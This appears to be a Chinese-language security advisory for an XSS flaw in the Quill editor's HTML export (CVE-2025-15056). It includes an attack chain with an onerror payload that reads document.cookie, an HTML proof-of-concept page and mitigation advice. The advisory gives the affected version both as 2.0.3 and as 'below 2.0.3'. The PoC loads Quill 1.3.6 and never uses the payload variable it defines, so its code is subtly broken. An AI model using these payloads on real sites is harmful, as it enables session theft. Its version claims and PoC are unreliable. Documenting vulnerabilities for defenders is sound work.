Quill 2.0.3 HTML导出功能跨站脚本(XSS)漏洞

漏洞信息

漏洞编号

CVE-2025-15056

漏洞类型

跨站脚本攻击(XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Quill

漏洞概述

Quill是一个流行的富文本编辑器，广泛用于Web应用程序中。该漏洞存在于Quill的HTML导出功能中，由于缺乏充分的数据验证，攻击者可以通过构造恶意输入在导出的HTML内容中注入任意JavaScript代码。当用户查看或处理这些导出的HTML内容时，恶意脚本将在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等严重安全问题。此漏洞影响Quill 2.0.3版本，攻击复杂度较低，但需要用户交互触发，CVSS评分6.1属于中等严重程度。漏洞由fluidattacks安全团队发现并报告。

技术细节

该漏洞的根本原因在于Quill编辑器在处理HTML导出功能时，未对用户输入的内容进行充分的HTML转义和验证。攻击者可以利用Quill的富文本编辑功能插入恶意构造的HTML/JavaScript代码，当这些内容被导出时，恶意代码会被包含在输出的HTML中。具体来说，攻击者可能在编辑器中插入包含<script>标签或事件处理器属性（如onerror、onload等）的代码片段，这些代码在导出后的HTML中被保留而非转义。当其他用户查看或渲染这些导出的HTML时，浏览器会将其解析为可执行代码，从而触发XSS攻击。攻击者可以通过此方式窃取用户Cookie、劫持会话、执行任意操作或重定向用户到恶意网站。修复此漏洞需要在导出HTML前对所有用户输入进行严格的输入验证和输出编码。

攻击链分析

STEP 1

步骤1

攻击者访问使用Quill编辑器的目标网站，在编辑器中输入包含恶意JavaScript代码的内容，如<img src=x onerror=alert(document.cookie)>

STEP 2

步骤2

攻击者利用Quill的HTML导出功能将恶意内容导出为HTML文件或复制到剪贴板

STEP 3

步骤3

导出的HTML内容被保存或传输给其他用户，恶意脚本代码在导出过程中未被转义或清除

STEP 4

步骤4

受害者在浏览器中打开或渲染导出的HTML内容，浏览器将恶意代码解析为可执行脚本

STEP 5

步骤5

恶意JavaScript代码在受害者浏览器上下文中执行，可窃取Cookie、会话令牌或其他敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-15056 PoC for Quill HTML Export XSS -->
<!-- This PoC demonstrates the XSS vulnerability in Quill's HTML export feature -->

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-15056 PoC</title>
    <link href="https://cdn.quilljs.com/1.3.6/quill.snow.css" rel="stylesheet">
    <script src="https://cdn.quilljs.com/1.3.6/quill.js"></script>
</head>
<body>
    <h1>Quill XSS Vulnerability PoC - CVE-2025-15056</h1>
    
    <div id="editor-container"></div>
    <button onclick="exportHTML()">Export HTML</button>
    <button onclick="showVulnerableOutput()">Show Vulnerable Output</button>
    
    <h2>Exported HTML:</h2>
    <div id="exported-html"></div>
    
    <h2>Rendered Output (Vulnerable):</h2>
    <div id="rendered-output"></div>
    
    <script>
        var quill = new Quill('#editor-container', {
            theme: 'snow'
        });
        
        // XSS payload that can be inserted into Quill editor
        var xssPayload = '<img src=x onerror="alert(String.fromCharCode(67,86,69,45,50,48,50,53,45,49,53,48,53,54,32,88,83,83))">';
        
        function exportHTML() {
            // Get HTML content from Quill editor
            var htmlContent = quill.root.innerHTML;
            
            // Display the exported HTML
            document.getElementById('exported-html').innerText = htmlContent;
            
            // Store for later use
            window.exportedHTML = htmlContent;
        }
        
        function showVulnerableOutput() {
            // Render the exported HTML without sanitization (vulnerable)
            document.getElementById('rendered-output').innerHTML = window.exportedHTML;
        }
        
        // Alternative: Directly inject via clipboard/paste
        // The vulnerability allows XSS via the HTML export feature
    </script>
    
    <!-- Attack scenario:
    1. Attacker inserts malicious HTML/JavaScript into Quill editor
    2. Content is exported as HTML
    3. Victim views the exported HTML
    4. Malicious script executes in victim's browser
    -->
</body>
</html>

影响范围

Quill < 2.0.3

防御指南

临时缓解措施

在等待官方修复期间，可采取以下临时缓解措施：1)对Quill导出的所有HTML内容进行严格的消毒处理，使用DOMPurify等可信的HTML清理库；2)在应用层实施Content Security Policy (CSP)限制脚本执行；3)对导出功能增加额外的输入验证规则，过滤<script>标签和事件处理器属性；4)限制导出内容的格式，仅允许安全子集的HTML标签和属性。建议尽快升级到Quill官方发布的安全修复版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15056
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15056
3 Details https://www.cvedetails.com/cve/CVE-2025-15056/
4 VulDB https://vuldb.com/cve/CVE-2025-15056
5 Link https://fluidattacks.com/advisories/diomedes
6 Link https://github.com/slab/quill